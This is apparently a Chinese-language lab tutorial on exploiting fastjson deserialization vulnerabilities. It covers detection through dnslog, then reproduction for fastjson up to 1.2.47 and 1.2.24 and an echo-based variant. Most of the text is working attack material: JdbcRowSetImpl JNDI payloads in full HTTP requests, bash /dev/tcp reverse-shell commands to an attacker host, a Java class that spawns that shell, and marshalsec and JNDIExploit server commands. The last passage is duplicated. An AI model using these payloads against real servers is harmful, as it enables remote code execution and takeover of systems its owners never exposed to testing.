fastjson反序列化漏洞
文章目录
- fastjson反序列化漏洞
-
- 1.漏洞原理
- 2.探测方式
-
- [2.1 查看回显](#2.1 查看回显)
- [2.2 LDAP/RMI服务测试](#2.2 LDAP/RMI服务测试)
- 3.LDAP/RMI服务搭建要求
- 4.漏洞复现
-
- [4.1 fastjson <=1.2.47 反序列化导致任意命令执行漏洞](#4.1 fastjson <=1.2.47 反序列化导致任意命令执行漏洞)
-
- [4.1.1 环境准备](#4.1.1 环境准备)
- [4.1.2 复现过程](#4.1.2 复现过程)
- [4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞](#4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞)
-
- [4.2.1 环境准备](#4.2.1 环境准备)
- [4.2.2 复现过程](#4.2.2 复现过程)
- [4.3 fastjson即时回显利用](#4.3 fastjson即时回显利用)
1.漏洞原理
Fastjson是一款开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
fastjson反序列化与weblogic、shiro反序列化类似,在客户端将json数据进行序列化传送至服务端后,服务端会将其反序列化读取其中数据,若客户端操控json数据,加入一些恶意类方法、代码,则可能会造成服务端代码执行。同时由于fastjson采用黑名单过滤的方式,也存在着被绕过的风险。
当前出现的fastjson反序列化漏洞由于无法做到回显,一般会使用ldap和rmi远程调用的方式来进行getshell。攻击机发送恶意payload来使漏洞服务端进行ldap或rmi远程调用,调用搭建好的ldap或rmi服务上所布置好的class类进而执行,从而实现shell反弹。
2.探测方式
2.1 查看回显
当提交一个json数据时,可以故意截取数据内容,使其不完整,再查看服务器返回包内容是否写有fastjson
例如:
删去括号使其不完整,便出现了fastjson
2.2 LDAP/RMI服务测试
利用github上已经编译好的jar利用包,在VPS上启动ldap服务来构造payload来使服务端请求dnslog探测是否存在漏洞。
plain
java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.155.128 80 "curl sr7wx4.dnslog.cn"
利用所提供的payload进行dnslog
http
POST / HTTP/1.1
Host: 192.168.155.128:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN
Connection: close
Content-Length: 187
Content-Type:application/json
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.155.128:80/Object","autoCommit":true}}
平台成功接收,证明存在漏洞
3.LDAP/RMI服务搭建要求
4.漏洞复现
4.1 fastjson <=1.2.47 反序列化导致任意命令执行漏洞
4.1.1 环境准备
攻击机:win10 burp
vps:java python nc
靶机:kali
(条件有限vps上要搭建的东西移到了同为靶机的kali上)
4.1.2 复现过程
启动nc来进行监听,端口为4444
plain
nc -ltvp 4444
此时启动jar包,该包专为1.2.47版本使用,利用该包启动ldap服务,前段ip为ldap服务ip及端口,后段为nc监听ip及端口。(https://github.com/wyzxxz/fastjson_rce_tool)
plain
java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.155.128 81 "bash=/bin/bash -i >& /dev/tcp/192.168.155.128/4444 0>&1"
同样可以修改参数为fastjson.EvilRMIServer,启动RMI服务
返回payload,利用post方式将其发送至靶机服务端,同时Content-Type类型为application/json。
查看nc,已经接收到反弹的shell了
4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞
4.2.1 环境准备
攻击机:win10 burp
vps:java python nc
靶机:kali
(条件有限vps上要搭建的东西移到了同为靶机的kali上)
4.2.2 复现过程
由于该版本没有专用的jar包需要自己进行编译。
首先编译远程调用的java文件(建议使用jdk1.8编译,其他版本编译出来的可能会不执行)
plain
payload如下:
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e)
{
// do nothing
}
}
}
反弹shellpayload
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.155.128/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
利用javac编译为class文件
plain
javac TouchFile.java
当前文件夹则会生成一个class文件
安装maven环境
plain
apt-get install maven
然后在编译好的java文件夹下启动一个http服务
plain
python -m SimpleHTTPServer 3333
现在我们利用marshalsec项目,启动一个RMI服务器,监听9999端口,并使其加载编译好的类文件TouchFile.class
下载该项目,然后进行项目编译
plain
mvn clean package -DskipTests
编译成功后会多出一个target文件夹,其中便有我们需要的jar包
此时执行监听命令
plain
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名/#TouchFile" 9999
抓取数据包发送payload
http
POST / HTTP/1.1
Host: 192.168.155.128:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN
Connection: close
Content-Length: 123
Content-Type:application/json
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.155.128:9999/TouchFile",
"autoCommit":true
}
}
成功获得shell
4.3 fastjson即时回显利用
前情提要
在大部分情况下,可能没有做到如上面两种试验里这么顺利,遇到最多的问题就是class文件不读取或者读取了不执行,可以直接利用工具,进行一个帮助的回显
工具链接:
plain
https://github.com/WhiteHSBG/JNDIExploit
利用该工具首先需要阅读一下说明(在工具文件内或者github上看),该工具主要启动ldap服务,支持多种路由格式,可以根据不同的路由选择不同的payloadtype和GadgetType。
启动工具
plain
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vps-ip
漏洞复现
具体格式不变,同样是普通的fastjson格式的payload,但是里面引用的连接需要进行修改,同时,需要在hrader头中加入cmd: ifconfig等等命令
http
POST /api/auth/ainfo/contact/listFamily HTTP/1.1
Host: xxxxxx
Content-Length: 168
sn: null
cmd: ifconfig
Content-Type: application/json
Accept: application/json, text/plain, */*
timestamp: 1663245585261
device: null
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
utype: 1
token: null
sign: 892ed5ef47f06f89fb6e9a6812718b68
Origin: http://xxxx:8095
Referer: http://xxxx:8095/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://xxxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho","autoCommit":true}}
将payload摘出来看
plain
ldap://xxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho
ldap://xxxx:1389:不用说
Deserialization:说明中的Deserialization路由
CommonsCollectionsK1:GadgetType类型,可以挨个尝试直到回显
TomcatEcho:PayloadType类型用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
此时直接发送请求,可以看到直接利用tomcat进行了回显
看
plain
ldap://xxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho
ldap://xxxx:1389:不用说
Deserialization:说明中的Deserialization路由
CommonsCollectionsK1:GadgetType类型,可以挨个尝试直到回显
TomcatEcho:PayloadType类型用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
此时直接发送请求,可以看到直接利用tomcat进行了回显